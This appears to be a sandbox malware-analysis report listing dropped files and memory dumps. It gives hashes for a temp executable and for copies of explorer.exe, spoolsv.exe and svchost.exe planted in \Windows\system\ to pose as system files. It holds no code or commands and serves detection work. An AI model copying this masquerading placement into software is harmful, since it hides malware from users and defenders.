\Users\Admin\AppData\Local\Temp\fghbdx.exe

Filesize
8.2MB

MD5
8e1389befd1c9d9fb8a0281775b81504

SHA1
c3063d4598129d24f8592d79928cdc2f4349017c

SHA256
05f105581f86ed7f3a38897311799c5d07bc519bfd3b32c95863c6691e4056bf

SHA512
add0bde66b0d6c4dd0043e42abde1f163b9eb43e022aa33bb68b03ee894410bdc164474e97af517471164fbf6e929711d518856b814896aa37eb05b4986694e2

Download Submit
\Windows\system\explorer.exe

Filesize
206KB

MD5
3d0ba5ffde02678eab68469a08b6b263

SHA1
45899d2c3117efc4e6918773269e44247dc95e1a

SHA256
06ecebf1adb9a9b57b079dedece32b56b0a41021381cb788abec2d236f7bb51c

SHA512
fd93e01244908afc00cc57638d048549b6a819a080dba6c468385cb4f04d74b2cfc66dafebc9cf8073941673d5d5d95ec184c64d4e4873dc110601be5abec709

Download Submit
\Windows\system\spoolsv.exe

Filesize
206KB

MD5
3341e3bef7996d87bcf87e56b5b50687

SHA1
3b382b84e763e0cb6f82c974b769a074facd7403

SHA256
00f24e401b7f4a220c42681fd849ba07a1140a31552d414d77c1acca806994bb

SHA512
4106fa1d08607430b9a908139e89e43f18bd5c582762866c2d3b6f2f5d3feadd76bd87adfec67288fc12fa50ffe3825a62d23d3a215c23d008d1522175560dff

Download Submit
\Windows\system\svchost.exe

Filesize
206KB

MD5
1851c1f54d9dae8ef9b86a48ff5a5a90

SHA1
d89b4984f0c4c233263ac7891586f31e3599f1ba

SHA256
9954dc186456d9dc8d6fbfb3267adfd1dc4b74a0e61a6685e942fc9fb9949cfd

SHA512
eb8d627b5187bccdba398c014288e8b7dd137e2c9d7f02ac24bd899dc1ea2f9ba8d094f54f2822ea3bf6f28d6cda5fa4d47cf1de1837dd621deb961185e69b8c

Download Submit
memory/1664-240-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1816-227-0x000007FEF6C10000-0x000007FEF72D4000-memory.dmp

Filesize
6.8MB

Download
memory/2056-118-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2060-246-0x0000000000230000-0x0000000000270000-memory.dmp

Filesize
256KB

Download
memory/2060-85-0x0000000000230000-0x0000000000270000-memory.dmp

Filesize
256KB

Download
memory/2060-245-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2420-233-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2420-242-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2448-103-0x0000000003530000-0x0000000003570000-memory.dmp

Filesize
256KB

Download
memory/2524-122-0x0000000000230000-0x0000000000270000-memory.dmp

Filesize
256KB

Download
memory/2524-241-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2524-113-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2524-232-0x0000000002C30000-0x0000000002C70000-memory.dmp

Filesize
256KB

Download
memory/2616-0-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2616-2-0x00000000002E0000-0x0000000000320000-memory.dmp

Filesize
256KB

Download
memory/2616-1-0x00000000002E0000-0x0000000000320000-memory.dmp

Filesize
256KB

Download
memory/2616-134-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2756-77-0x0000000002720000-0x0000000002760000-memory.dmp

Filesize
256KB

Download
memory/2756-132-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2792-133-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2792-24-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2792-41-0x0000000002FD0000-0x0000000003010000-memory.dmp

Filesize
256KB

Download
memory/2908-59-0x0000000001F50000-0x0000000001F90000-memory.dmp

Filesize
256KB

Download
memory/2908-243-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2908-244-0x0000000001F50000-0x0000000001F90000-memory.dmp

Filesize
256KB

Download